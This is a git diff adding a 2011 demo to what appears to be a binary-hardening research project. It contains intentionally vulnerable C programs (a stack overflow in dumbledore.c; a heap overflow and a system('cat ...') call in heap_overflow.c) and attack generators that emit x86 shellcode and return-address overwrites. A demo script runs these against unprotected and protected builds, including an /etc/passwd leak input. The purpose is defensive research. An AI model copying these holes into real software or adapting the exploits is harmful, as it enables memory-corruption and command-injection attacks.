diff --git a/.gitattributes b/.gitattributes
index 1e249cf3af9cf30f89a2fded9877a8d51282bd6f..84b25593026e81e2f6482903e05472e449a0cd33 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -2,6 +2,20 @@
/Makefile -text
chopzero_src/Makefile -text
chopzero_src/chopzero.c -text
+demos/demo.aug_9_2011/Makefile -text
+demos/demo.aug_9_2011/dumbledore.c -text
+demos/demo.aug_9_2011/dumbledore.exploits/Makefile -text
+demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c -text
+demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c -text
+demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c -text
+demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c -text
+demos/demo.aug_9_2011/dumbledore.exploits/badA.txt -text
+demos/demo.aug_9_2011/dumbledore.exploits/badB.txt -text
+demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt -text
+demos/demo.aug_9_2011/heap_overflow.c -text
+demos/demo.aug_9_2011/help.txt -text
+demos/demo.aug_9_2011/ps_demo.sh -text
+demos/demo.aug_9_2011/sample.txt -text
demos/demo.jan_21_2011/Makefile -text
demos/demo.jan_21_2011/demo_analyze.sh -text
demos/demo.jan_21_2011/dumbledore.c -text
diff --git a/demos/demo.aug_9_2011/Makefile b/demos/demo.aug_9_2011/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..5923ac840298d0cf73d54e34328d168b31467822
--- /dev/null
+++ b/demos/demo.aug_9_2011/Makefile
@@ -0,0 +1,26 @@
+TOOLBASE=${PEASOUP_HOME}/tools
+
+all: dumbledore.original dumbledore.protected heap_overflow.original heap_overflow.protected
+
+heap_overflow.original: heap_overflow.o
+ ${TOOLBASE}/ps_link.sh heap_overflow.o -o heap_overflow.original
+
+heap_overflow.protected: heap_overflow.original
+ ${TOOLBASE}/ps_analyze.sh heap_overflow.original heap_overflow.protected
+ echo "Note: this step will end in an error for now, but that's OK"
+
+dumbledore.original: dumbledore.o
+ ${TOOLBASE}/ps_link.sh dumbledore.o -o dumbledore.original
+
+dumbledore.protected: dumbledore.original
+ ${TOOLBASE}/ps_analyze.sh dumbledore.original dumbledore.protected
+ echo "Note: this step will end in an error for now, but that's OK"
+
+.c.o:
+ ${TOOLBASE}/ps_comp.sh $<
+
+clean:
+ rm -f *.o heap_overflow.original heap_overflow.protected dumbledore.original dumbledore_cmd.original dumbledore.protected dumbledore_cmd.protected tmp
+ rm -Rf peasoup_executable_directory.*
+ # clean up IRDB and reset tables
+ if [ ! "X" = "X"${PGUSER} ]; then sh ${TOOLBASE}/db/drop_my_tables.sh; sh ${TOOLBASE}/db/pdb_setup.sh; fi
diff --git a/demos/demo.aug_9_2011/dumbledore.c b/demos/demo.aug_9_2011/dumbledore.c
new file mode 100644
index 0000000000000000000000000000000000000000..02e2f05c1105deb85faf5281272fda79cb817f74
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.c
@@ -0,0 +1,47 @@
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+enum {BUFSIZE = 98};
+
+char grade = 'D';
+char Name[BUFSIZE];
+FILE *f;
+
+void readString(char *s) {
+ char buf[BUFSIZE];
+ int i = 0;
+ int c;
+
+ for (;;)
+ {
+ c = getchar();
+ if ((c == EOF) || (c == '\n'))
+ break;
+ buf[i] = c;
+ i++;
+ }
+ buf[i] = '\0';
+
+ for (i = 0; i < BUFSIZE; i++)
+ s[i] = buf[i];
+}
+
+
+int main(void)
+{
+ mprotect((void*)((unsigned int)Name & 0xfffff000), 1,
+ PROT_READ | PROT_WRITE | PROT_EXEC);
+ readString(Name);
+
+ if (strcmp(Name, "Wizard in Training") == 0)
+ grade = 'B';
+
+ printf("Thank you, %s.\n", Name);
+ printf("I recommend that you get a grade of %c on this assignment.\n", grade);
+
+ exit(0);
+}
+
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/Makefile b/demos/demo.aug_9_2011/dumbledore.exploits/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..1db272320fd9b27f577c518da9805eaa5fa52475
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.exploits/Makefile
@@ -0,0 +1,30 @@
+# This file contains rules to build attack generators for the dumbledore example
+# which uses file input.
+# attack-gradeXXX.no_strata is the attack generator for a non-stratafied
+# application
+# The attack generator for stratafied application may need
+# to be slightly different
+PS_TOOLBASE=${PEASOUP_HOME}/tools
+
+all: attack-gradeA attack-gradeB attack-strata_tracing
+
+attack-strata_tracing: attack-strata_tracing.o
+ ${PS_TOOLBASE}/ps_link.sh attack-strata_tracing.o -o attack-strata_tracing
+
+attack-strata_parm1: attack-strata_parm1.o
+ ${PS_TOOLBASE}/ps_link.sh attack-strata_parm1.o -o attack-strata_parm1
+
+attack-gradeA.no_strata: attack-gradeA.no_strata.o
+ ${PS_TOOLBASE}/ps_link.sh attack-gradeA.no_strata.o -o gradeA.no_strata
+
+attack-gradeB.no_strata: attack-gradeB.no_strata.o
+ ${PS_TOOLBASE}/ps_link.sh attack-gradeB.no_strata.o -o gradeB.no_strata
+
+attack-graCE_infinite: attack-graCE_infinite.o
+ ${PS_TOOLBASE}/ps_link.sh attack-graCE_infinite.o -o graCE_infinite
+
+.c.o:
+ ${PS_TOOLBASE}/ps_comp.sh $<
+
+clean:
+ rm gradeA.no_strata gradeB.no_strata attack-strata_tracing attack-graCE_infinite attack-strata_parm1 *.o
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c
new file mode 100755
index 0000000000000000000000000000000000000000..097546fa85000982683b0a674bef5fad5eb3cbfa
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeA.no_strata.c
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <string.h>
+ /* stack location address */
+char attackString[] =
+ "Ja" /* 0xbfffefa6 */ /* Name: 0x80c80c0 */
+ "ck D" /* 0xbfffefa8 */ /* Name: 0x80c80c2 */
+ "avid" /* 0xbfffefac */ /* Name: 0x80c80c6 */
+ "son\x00" /* 0xbfffefb0 */ /* Name: 0x80c80ca */
+ "\xc6\x05\x08\x60" /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb $0x41,0x080c6008 addr of grade */
+ "\x0c\x08\x41\x90" /* 0xbfffefb8 */ /* nop is \x90 */
+ "\x68\xf7\x82\x04" /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */
+ "\x08\x90\xc3\x3e" /* 0xbfffefc0 */ /* nop is \x90; c3 is ret inst */
+ "\x20\x20\x20\x20" /* 0xbfffefc4 */
+ "\x20\x20\x20\x20" /* 0xbfffefc8 */
+ "\x20\x20\x20\x20" /* 0xbfffefcc */
+ "\x20\x20\x20\x20" /* 0xbfffefd0 */
+ "\x20\x20\x20\x20" /* 0xbfffefd4 */
+ "\x20\x20\x20\x20" /* 0xbfffefd8 */
+ "\x20\x20\x20\x20" /* 0xbfffefdc */
+ "\x20\x20\x20\x20" /* 0xbfffefe0 */
+ "\x20\x20\x20\x20" /* 0xbfffefe4 */
+ "\x20\x20\x20\x20" /* 0xbfffefe8 */
+ "\x20\x20\x20\x20" /* 0xbfffefec */
+ "\x20\x20\x20\x20" /* 0xbfffeff0 */
+ "\x20\x20\x20\x20" /* 0xbfffeff4 */
+ "\x20\x20\x20\x20" /* 0xbfffeff8 */
+ "\x20\x20\x20\x20" /* 0xbfffeffc */
+ "\x20\x20\x20\x20" /* 0xbffff000 */
+ "\x20\x20\x20\x20" /* 0xbffff004 */
+ "\x62\x00\x00\x00" /* 0xbffff008 */ /* i here */
+ "\x20\x20\x20\x20" /* 0xbffff00c */ /* c here */
+ "\x20\x20\x20\x20" /* 0xbffff010 */
+ "\x20\x20\x20\x20" /* 0xbffff014 */
+ "\x38\xf0\xff\xbf" /* 0xbffff018 */ /* ebp aka frame ptr */
+ "\xce\x80\x0c\x08" /* 0xbffff01c */ /* return address should b
+ the addr of Name
+ where injection code is
+ 0x80c80ce */
+ "\xc0\x80\x0c\x08" /* 0xbffff020 */ /* address of Name */
+ "\x0a\x0a\x0a\x0a" ; /* 0xbffff024 */
+/* The key to the attack is to change the return address (located on the
+ stack at address 0x22cc7c as indicated in the above picture to
+ point to the code location in main where the grade is set to a "B".
+ However, it is also important for the buffer overrun to preserve the
+ frame pointer and the address of grade on the stack (grade is passed and s
+ points to it
+*/
+
+
+int main() {
+ int i;
+ char *p = attackString;
+ for (i = 0; i < sizeof(attackString); i++) {
+ putchar(*p);
+ p++;
+ }
+ return 1;
+}
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c
new file mode 100644
index 0000000000000000000000000000000000000000..799646630e86d53e854c28f52c56cf9dc1279aa5
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-gradeB.no_strata.c
@@ -0,0 +1,47 @@
+#include <stdio.h>
+#include <string.h>
+ /* stack location address */
+char attackString[] = "Ja" /* 0x0bfffefa6 */
+ "ck D" /* 0x0bfffefa8 */
+ "avid" /* 0x0bfffefac */
+ "son\x00" /* 0x0bfffefb0 */
+ "\xc6\x05\x20\x20" /* 0x0bfffefb4 */
+ "\x40\x20\x41\x90" /* 0x0bfffefb8 */
+ "\x68\x33\x11\x40" /* 0x0bfffefbc */
+ "\x00\x90\xc3\x3e" /* 0x0bfffefc0 */
+ "\x20\x20\x20\x20" /* 0x0bfffefc4 */
+ "\x20\x20\x20\x20" /* 0x0bfffefc8 */
+ "\x20\x20\x20\x20" /* 0x0bfffefcc */
+ "\x20\x20\x20\x20" /* 0x0bfffefd0 */
+ "\x20\x20\x20\x20" /* 0x0bfffefd4 */
+ "\x20\x20\x20\x20" /* 0x0bfffefd8 */
+ "\x20\x20\x20\x20" /* 0x0bfffefdc */
+ "\x20\x20\x20\x20" /* 0x0bfffefe0 */
+ "\x20\x20\x20\x20" /* 0x0bfffefe4 */
+ "\x20\x20\x20\x20" /* 0x0bfffefe8 */
+ "\x20\x20\x20\x20" /* 0x0bfffefec */
+ "\x20\x20\x20\x20" /* 0x0bfffeff0 */
+ "\x20\x20\x20\x20" /* 0x0bfffeff4 */
+ "\x20\x20\x20\x20" /* 0x0bfffeff8 */
+ "\x20\x20\x20\x20" /* 0x0bfffeffc */
+ "\x20\x20\x20\x20" /* 0x0bffff000 */
+ "\x20\x20\x20\x20" /* 0x0bffff004 */
+ "\x62\x00\x00\x00" /* 0x0bffff008 */ /* i here */
+ "\x20\x20\x20\x20" /* 0x0bffff00c */ /* c here */
+ "\x20\x20\x20\x20" /* 0x0bffff010 */
+ "\x20\x20\x20\x20" /* 0x0bffff014 */
+ "\x38\xf0\xff\xbf" /* 0x0bffff018 */ /* ebp */
+ "\xfd\x82\x04\x08" /* 0x0bffff01c */ /* return addr */
+ "\xc0\x80\x0c\x08" /* 0x0bffff020 */ /* addr Name */
+ "\x0a\x0a\x0a\x0a" /* 0x0bffff024 */
+ "\x0a\x0a\x0a\x0a"; /* 0x0bffff028 */
+int main() {
+ int i;
+ char *p = attackString;
+ for (i = 0; i < sizeof(attackString); i++) {
+ putchar(*p);
+ p++;
+ }
+ return 1;
+}
+
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c
new file mode 100644
index 0000000000000000000000000000000000000000..8731e83dd94128cb79c5bff647c3460475a23a0d
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_parm1.c
@@ -0,0 +1,62 @@
+/* This attack generator attempts to overwrite the first parameter to
+ * readString with the address of one strata variable, strata_tracing
+ * Then when the copying of the buffer to the parameter is carried out,
+ * the value of strata_tracing can be changed to 1.
+ *
+ * strata_tracing is laid out next to the TI struct.
+ * For the program not to crash,
+ * the attack must preserve all the bytes of TI that might be overwritten.
+ * This means that the first 98 bytes (BUFSIZE) of the attackString should
+ * match the memory starting from strata_tracing, with the exception of the
+ * changed value of strata_tracing that is desired.
+
+ */
+
+#include <stdio.h>
+#include <string.h>
+ /* stack location address */
+char attackString[] = "\x01\x00" /* 0x0bfffefa6 */
+ "\x00\x00\x00\x00" /* 0x0bfffefa8 */
+ "\x00\x00\x00\x00" /* 0x0bfffefac */
+ "\x00\x00\x00\x00" /* 0x0bfffefb0 */
+ "\x00\x00\x00\x00" /* 0x0bfffefb4 */
+ "\x00\x00\x00\x00" /* 0x0bfffefb8 */
+ "\x00\x00\x00\x00" /* 0x0bfffefbc */
+ "\x00\x00\x00\x00" /* 0x0bfffefc0 */
+ "\x00\x00\xd2\x27" /* 0x0bfffefc4 */
+ "\x25\x09\x55\x12" /* 0x0bfffefc8 */
+ "\x0d\x09\xfc\x27" /* 0x0bfffefcc */
+ "\x25\x09\xb9\x67" /* 0x0bfffefd0 */
+ "\x25\x09\x2e\x49" /* 0x0bfffefd4 */
+ "\x25\x09\x7c\x51" /* 0x0bfffefd8 */
+ "\x25\x09\x6e\x53" /* 0x0bfffefdc */
+ "\x25\x09\x84\x5a" /* 0x0bfffefe0 */
+ "\x25\x09\x10\xf6" /* 0x0bfffefe4 */
+ "\x25\x09\xd9\x2c" /* 0x0bfffefe8 */
+ "\x25\x09\xe3\x67" /* 0x0bfffefec */
+ "\x25\x09\xf0\xd1" /* 0x0bfffeff0 */
+ "\x25\x09\x30\x9d" /* 0x0bfffeff4 */
+ "\x25\x09\xb4\x67" /* 0x0bfffeff8 */
+ "\x25\x09\xff\x95" /* 0x0bfffeffc */
+ "\x25\x09\x98\x18" /* 0x0bffff000 */
+ "\x25\x09\x8e\x67" /* 0x0bffff004 */
+ "\x62\x00\x00\x00" /* 0x0bffff008 */ /* i here */
+ "\x20\x20\x20\x20" /* 0x0bffff00c */ /* c here */
+ "\x20\x20\x20\x20" /* 0x0bffff010 */
+ "\x20\x20\x20\x20" /* 0x0bffff014 */
+ "\x38\xf0\xff\xbf" /* 0x0bffff018 */ /* ebp */
+ "\xfd\x82\x04\x08" /* 0x0bffff01c */ /* return addr */
+ "\x00\xe2\x33\x09" /* 0x0bffff020 */
+ /* addr of parm 1, changed to addr of strata_tracing */
+ "\x0a\x0a\x0a\x0a" /* 0x0bffff024 */
+ "\x0a\x0a\x0a\x0a"; /* 0x0bffff028 */
+int main() {
+ int i;
+ char *p = attackString;
+ for (i = 0; i < sizeof(attackString); i++) {
+ putchar(*p);
+ p++;
+ }
+ return 1;
+}
+
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c
new file mode 100755
index 0000000000000000000000000000000000000000..82605289267e12b06a36299f226b3307dc77eebd
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.exploits/attack-strata_tracing.c
@@ -0,0 +1,64 @@
+#include <stdio.h>
+#include <string.h>
+
+/* This attack generator crafts a code injection attack which
+ * changes one of Strata's memory locations. In this instance
+ * strata_tracing will be changed to a value of 1
+ * which will turn on tracing output
+ */
+ /* stack location address */
+char attackString[] =
+ "Ja" /* 0xbfffefa6 */ /* Name: 0x80c80c0 */
+ "ck D" /* 0xbfffefa8 */ /* Name: 0x80c80c2 */
+ "avid" /* 0xbfffefac */ /* Name: 0x80c80c6 */
+ "son\x00" /* 0xbfffefb0 */ /* Name: 0x80c80ca */
+ "\xc6\x05\x00\xe2" /* 0xbfffefb4 */ /* Name: 0x80c80ce */ /* movb 0x1,0x0x0933e200 address of strata_tracing */
+ "\x33\x09\x01\x90" /* 0xbfffefb8 */ /* nop is \x90 */
+ "\x68\xf7\x82\x04" /* 0xbfffefbc */ /* op 68 is push ret addr 0x080482f7 */
+ "\x08\x90\xc3\x3e" /* 0xbfffefc0 */ /* nop is \x90; c3 is ret inst */
+ "\x20\x20\x20\x20" /* 0xbfffefc4 */
+ "\x20\x20\x20\x20" /* 0xbfffefc8 */
+ "\x20\x20\x20\x20" /* 0xbfffefcc */
+ "\x20\x20\x20\x20" /* 0xbfffefd0 */
+ "\x20\x20\x20\x20" /* 0xbfffefd4 */
+ "\x20\x20\x20\x20" /* 0xbfffefd8 */
+ "\x20\x20\x20\x20" /* 0xbfffefdc */
+ "\x20\x20\x20\x20" /* 0xbfffefe0 */
+ "\x20\x20\x20\x20" /* 0xbfffefe4 */
+ "\x20\x20\x20\x20" /* 0xbfffefe8 */
+ "\x20\x20\x20\x20" /* 0xbfffefec */
+ "\x20\x20\x20\x20" /* 0xbfffeff0 */
+ "\x20\x20\x20\x20" /* 0xbfffeff4 */
+ "\x20\x20\x20\x20" /* 0xbfffeff8 */
+ "\x20\x20\x20\x20" /* 0xbfffeffc */
+ "\x20\x20\x20\x20" /* 0xbffff000 */
+ "\x20\x20\x20\x20" /* 0xbffff004 */
+ "\x62\x00\x00\x00" /* 0xbffff008 */ /* i here */
+ "\x20\x20\x20\x20" /* 0xbffff00c */ /* c here */
+ "\x20\x20\x20\x20" /* 0xbffff010 */
+ "\x20\x20\x20\x20" /* 0xbffff014 */
+ "\x38\xf0\xff\xbf" /* 0xbffff018 */ /* ebp aka frame ptr */
+ "\xce\x80\x0c\x08" /* 0xbffff01c */ /* return address should b
+ the addr of Name
+ where injection code is
+ 0x80c80ce */
+ "\xc0\x80\x0c\x08" /* 0xbffff020 */ /* address of Name */
+ "\x0a\x0a\x0a\x0a" ; /* 0xbffff024 */
+/* The key to the attack is to change the return address (located on the
+ stack at address 0x22cc7c as indicated in the above picture to
+ point to the code location in main where the grade is set to a "B".
+ However, it is also important for the buffer overrun to preserve the
+ frame pointer and the address of grade on the stack (grade is passed and s
+ points to it
+*/
+
+
+int main() {
+ int i;
+ char *p = attackString;
+ for (i = 0; i < sizeof(attackString); i++) {
+ putchar(*p);
+ p++;
+ }
+ return 1;
+}
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/badA.txt b/demos/demo.aug_9_2011/dumbledore.exploits/badA.txt
new file mode 100644
index 0000000000000000000000000000000000000000..2103f665448a25c644bb81f462b2bcc0a490453c
Binary files /dev/null and b/demos/demo.aug_9_2011/dumbledore.exploits/badA.txt differ
diff --git a/demos/demo.aug_9_2011/dumbledore.exploits/badB.txt b/demos/demo.aug_9_2011/dumbledore.exploits/badB.txt
new file mode 100644
index 0000000000000000000000000000000000000000..c3520ece5ad8b805d5f40c78ee09bfd1c0f002e1
Binary files /dev/null and b/demos/demo.aug_9_2011/dumbledore.exploits/badB.txt differ
diff --git a/demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt b/demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt
new file mode 100644
index 0000000000000000000000000000000000000000..eeae9c63ea9573190317c06a11a25f45d71bc738
--- /dev/null
+++ b/demos/demo.aug_9_2011/dumbledore.good_inputs/good.txt
@@ -0,0 +1 @@
+Jack Davidson
diff --git a/demos/demo.aug_9_2011/heap_overflow.c b/demos/demo.aug_9_2011/heap_overflow.c
new file mode 100644
index 0000000000000000000000000000000000000000..06c4aa1fe43eab816003982779af910b7d9e1f90
--- /dev/null
+++ b/demos/demo.aug_9_2011/heap_overflow.c
@@ -0,0 +1,54 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc, char * argv[])
+{
+ FILE *filed;
+ char *userinput=malloc(20);
+ char *outputfile=malloc(20);
+ char buf[256];
+
+ if (argc != 2)
+ {
+ printf("Usage: %s <file_to_open>\n", argv[0]);
+ exit(0);
+ }
+
+ // point outputfile at the help file
+ strcpy(outputfile, "help.txt");
+ strcpy(userinput, argv[1]);
+
+ // let's check out the memory addresses of userinput and outputfile
+ printf("userinput @ %p: %s\n",userinput,userinput);
+ printf("outputfile @ %p: %s\n", outputfile, outputfile);
+
+ // Do some error-checking: no /etc/passwd allowed as user input
+ if (strcmp("/etc/passwd",userinput)==0)
+ {
+ fprintf(stderr, "ERROR: You may not specify /etc/passwd as a file to view.\n");
+ exit(1);
+ }
+
+ filed = fopen(userinput, "r");
+ if (filed==NULL)
+ {
+ // if the file can't be opened, then print the help.txt
+ fprintf(stderr, "\nerror opening file %s\n", userinput);
+ sprintf(buf, "%s %s", "cat", outputfile);
+ system(buf);
+ exit(1);
+ }
+ else
+ {
+ printf("\nThe contents of %s are:\n", userinput);
+ fflush(stdout);
+ // print the word count of the file
+ sprintf(buf, "%s %s", "cat", userinput);
+ system(buf);
+ }
+
+ // fprintf(filed, "%s\n", userinput);
+ fclose(filed);
+ return 0;
+}
diff --git a/demos/demo.aug_9_2011/help.txt b/demos/demo.aug_9_2011/help.txt
new file mode 100644
index 0000000000000000000000000000000000000000..3fc3f4f685b073e23c81ad68f4d467b56c4a21c6
--- /dev/null
+++ b/demos/demo.aug_9_2011/help.txt
@@ -0,0 +1,8 @@
+#
+#
+# This is a help.txt file
+# It contains information about
+# the usage of this program
+# and arguments that may be passed.
+#
+#
diff --git a/demos/demo.aug_9_2011/ps_demo.sh b/demos/demo.aug_9_2011/ps_demo.sh
new file mode 100755
index 0000000000000000000000000000000000000000..152b61c9ab456bbff39893c97d59e12920dd234d
--- /dev/null
+++ b/demos/demo.aug_9_2011/ps_demo.sh
@@ -0,0 +1,164 @@
+#!/bin/sh
+
+if [ "${PEASOUP_HOME}x" = "x" ]; then
+ echo "environment variable: PEASOUP_HOME is empty."
+ echo "PEASOUP_HOME must be defined to point at a valid peasoup_examples directory"
+ exit 1
+fi
+
+if [ "${STRATA}x" = "x" ]; then
+ echo "environment variable: STRATA is empty. "
+ echo "STRATA must be defined to point at a valid Strata security branch"
+ exit 1
+fi
+
+# if the executable hasn't been built, then build it!
+if [ ! -f dumbledore.original ]; then
+ make dumbledore.original
+fi
+
+TOOLBASE=${PEASOUP_HOME}/tools
+
+# A pause function
+Pause()
+{
+ key=""
+ echo -n "\nPress any key to continue...\n"
+ echo
+ stty -icanon
+ key=`dd count=1 2>/dev/null`
+ stty icanon
+}
+
+# N.B. - Assumes that dumbledore.original has already been built.
+# clear the screen
+clear
+# 1) Run dumbledore_cmd.original with good input
+echo "Running dumbledore.original with a non-malicious input\n\n"
+good_input=`cat dumbledore.good_inputs/good.txt`
+echo "Input: ${good_input}\n"
+
+echo "./dumbledore.original < dumbledore.good_inputs/good.txt\n"
+
+Pause
+
+./dumbledore.original < dumbledore.good_inputs/good.txt
+
+Pause
+
+# clear screen before doing the next step
+clear
+
+# 2) Run dumbledore.original with a bad input that PEASOUP can catch
+# input is too long and overwrites return address and base pointer
+
+echo "Running dumbledore.original with CODE INJECTION input.\nReported grade will be changed from D to A.\n"
+
+bad_input=`cat dumbledore.exploits/badA.txt`
+echo "Input: ${bad_input}\n\n"
+echo "./dumbledore.original < dumbledore.exploits/badA.txt\n"
+
+Pause
+
+./dumbledore.original < dumbledore.exploits/badA.txt
+
+Pause
+clear
+
+# 3) Run dumbledore.protected on bad input A, show defeat of exploit
+echo "At 6-month review: Instruction Set Randomization"
+echo "Running PEASOUP-protected dumbledore on CODE INJECTION input.\n"
+echo "PEASOUP detects the code injection.\n"
+
+bad_input=`cat dumbledore.exploits/badA.txt`
+echo "Input: ${bad_input}\n\n"
+echo "./dumbledore.protected < dumbledore.exploits/badA.txt\n"
+
+Pause
+
+./dumbledore.protected < dumbledore.exploits/badA.txt
+
+Pause
+# clear the screen
+clear
+
+# 4) Run dumbledore.original on ARC INJECTION input
+echo "Running dumbledore.original with ARC INJECTION input\n"
+echo "Input will cause username check to be bypassed."
+echo "Reported grade will be B, instead of the expected D.\n"
+bad_input=`cat dumbledore.exploits/badB.txt`
+echo "Input: ${bad_input}\n\n"
+echo "./dumbledore.original < dumbledore.exploits/badB.txt\n"
+
+Pause
+
+./dumbledore.original < dumbledore.exploits/badB.txt
+
+Pause
+clear
+
+# 5) Run dumbledore.protected on bad input #2, show that we did not defeat the exploit
+echo "NEW since 6-month review: Instruction Layout Randomization"
+echo "Running PEASOUP-protected dumbledore with arc injection attack input\n\n"
+badBinput=`cat dumbledore.exploits/badB.txt`
+echo "Input: ${badBinput}\n\n"
+echo "./dumbledore.protected < dumbledore.exploits/badB.txt\n"
+
+Pause
+
+./dumbledore.protected < dumbledore.exploits/badB.txt
+
+
+Pause
+clear
+# 6) Run heap overflow original on some sample inputs
+echo "Heap overflow example: non-malicious inputs"
+echo "Program takes a filename as an argument and cat's the file."
+echo "Input: sample.txt\n\n"
+echo "./heap_overflow.original sample.txt\n"
+
+Pause
+
+./heap_overflow.original sample.txt
+
+Pause
+clear
+
+echo "Heap overflow example: another non-malicious input"
+echo "Input: /etc/passwd\n\n"
+echo "./heap_overflow.original /etc/passwd\n"
+
+Pause
+
+./heap_overflow.original /etc/passwd
+
+
+Pause
+clear
+
+echo "Heap overflow example: malicious input"
+echo "Overflow heap buffer to try and leak sensitive information."
+echo "Input: 012345678901234567890123/etc/passwd\n\n"
+echo "./heap_overflow.original 012345678901234567890123/etc/passwd\n"
+
+Pause
+
+./heap_overflow.original 012345678901234567890123/etc/passwd
+
+
+Pause
+clear
+
+# 7) Run PS_analyzed heap overflow
+echo "NEW since 6-month review: Heap Randomization"
+echo "Running PEASOUP-protected heap_overflow on malicious input"
+echo "Input: 012345678901234567890123/etc/passwd\n\n"
+echo "./heap_overflow.protected 012345678901234567890123/etc/passwd\n"
+
+Pause
+
+./heap_overflow.protected 012345678901234567890123/etc/passwd
+
+echo
+echo
+echo "END of DEMO"
diff --git a/demos/demo.aug_9_2011/sample.txt b/demos/demo.aug_9_2011/sample.txt
new file mode 100644
index 0000000000000000000000000000000000000000..4c7b3c71801fdcf4edcb0867f23586c67e62ffb8
--- /dev/null
+++ b/demos/demo.aug_9_2011/sample.txt
@@ -0,0 +1,41 @@
+
+int main(int argc, char * argv[])
+{
+ FILE *filed;
+ char *userinput=malloc(20);
+ char *outputfile=malloc(20);
+ char buf[256];
+
+ // point outputfile at the help file
+ strcpy(outputfile, "help.txt");
+ strcpy(userinput, argv[1]);
+
+ // Do some error-checking: no /etc/passwd allowed as user input
+ if (strcmp("/etc/passwd",userinput)==0)
+ {
+ fprintf(stderr, "ERROR: You may not specify /etc/passwd as a file to view.\n");
+ exit(1);
+ }
+
+ filed = fopen(userinput, "r");
+ if (filed==NULL)
+ {
+ // if the file can't be opened, then print the help.txt
+ fprintf(stderr, "\nerror opening file %s\n", userinput);
+ sprintf(buf, "%s %s", "cat", outputfile);
+ system(buf);
+ exit(1);
+ }
+ else
+ {
+ printf("\nThe contents of %s are:\n", userinput);
+ fflush(stdout);
+ // print the word count of the file
+ sprintf(buf, "%s %s", "cat", userinput);
+ system(buf);
+ }
+
+ // fprintf(filed, "%s\n", userinput);
+ fclose(filed);
+ return 0;
+}